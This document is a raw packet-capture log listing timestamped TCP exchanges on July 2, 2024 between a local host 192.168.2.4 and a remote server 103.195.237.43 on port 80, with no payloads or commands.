Jul 2, 2024 07:47:58.308875084 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.309678078 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309694052 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309706926 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309721947 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309736013 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.309736013 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.309745073 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309761047 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309772968 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.309772968 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.309775114 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309791088 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309803009 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.309803009 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.309807062 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.309813976 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.309834003 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.310525894 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.310543060 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.310556889 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.310560942 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.310583115 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.312158108 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.688697100 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.688730001 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.688745975 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.688798904 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.688826084 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.688936949 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.688954115 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.688971043 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.688978910 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.688987017 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689004898 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689004898 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689023972 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689044952 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689471960 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689487934 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689512968 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689519882 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689528942 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689544916 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689559937 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689574003 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689577103 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689584017 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689600945 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689604998 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689616919 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.689629078 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689642906 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.689662933 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690361023 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690376997 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690396070 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690404892 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690423965 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690429926 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690435886 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690464973 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690473080 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690495014 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690510988 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690527916 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690536976 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690572977 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690581083 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690628052 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690640926 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690675974 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690686941 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690716982 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.690721035 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.690762043 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691247940 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691281080 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691293001 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691315889 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691324949 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691349983 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691359997 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691382885 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691395044 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691418886 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691426992 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691452980 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691464901 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691487074 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691497087 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691521883 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.691534996 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.691565990 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692183971 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692218065 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692233086 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692250967 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692265034 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692286015 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692295074 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692318916 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692327023 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692353964 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692363977 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692384005 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692399025 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692416906 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692423105 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692452908 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692464113 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692497969 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692513943 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692558050 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692914963 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692950010 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692960978 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.692980051 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.692994118 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.693022966 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.693032980 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.693067074 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.693089962 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.693100929 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.693109035 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.693141937 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.693151951 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.693173885 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.693181992 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.693209887 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.693216085 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.693255901 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.693996906 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694041967 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694050074 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694084883 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694094896 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694134951 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694174051 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694207907 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694217920 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694248915 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694318056 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694351912 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694367886 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694386959 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694391012 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694422007 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694431067 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694458961 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694467068 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694499016 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694763899 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694797039 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694809914 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694830894 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694840908 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694865942 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694875956 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694900990 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694905996 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694935083 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.694945097 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.694979906 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695133924 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695179939 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695245028 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695274115 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695288897 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695316076 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695355892 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695389986 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695400000 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695424080 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695436954 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695457935 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695466995 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695498943 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695708036 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695740938 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695758104 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695775032 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695787907 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695810080 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695816040 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695844889 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.695853949 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.695890903 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696093082 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696127892 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696141958 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696161985 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696167946 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696197033 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696206093 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696232080 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696242094 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696276903 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696455956 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696500063 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696507931 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696542025 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696552992 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696577072 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696593046 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696614027 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.696625948 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.696656942 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794008017 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794064045 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794080973 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794101000 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794106007 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794136047 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794141054 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794183969 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794240952 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794275045 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794287920 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794307947 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794317007 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794343948 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794353008 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794387102 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794692039 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794724941 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794739008 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794758081 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794768095 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794792891 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794802904 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794827938 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794836998 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794862986 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794872999 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794897079 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794907093 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794925928 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794941902 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794959068 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.794965982 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.794992924 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795002937 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795037985 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795384884 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795427084 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795523882 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795557022 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795567989 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795589924 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795598984 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795641899 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795624018 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795677900 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795691013 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795710087 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795718908 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795743942 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795754910 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795777082 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795782089 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795809984 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.795820951 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.795850039 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796436071 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796469927 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796489954 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796510935 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796519041 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796550989 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796564102 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796585083 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796595097 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796617985 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796627998 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796657085 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796668053 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796690941 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796695948 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796725035 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796734095 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796761036 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.796765089 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.796804905 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.797374010 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.797408104 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.797424078 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.797440052 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.797452927 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.797475100 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.797486067 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.797508001 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.797518969 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.797540903 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.797552109 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.797588110 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.797925949 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.797971964 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.797976971 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798010111 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798018932 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798043966 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798053026 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798079014 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798090935 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798110962 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798120022 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798146009 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798155069 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798178911 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798188925 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798212051 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798223019 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798260927 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798264027 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798307896 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798753023 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798794985 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798804045 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798835993 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798849106 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798870087 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798880100 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798902988 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798913002 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798937082 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798948050 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.798969984 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.798979998 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799004078 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799012899 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799038887 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799051046 CEST	49738	80	192.168.2.4	103.195.237.43
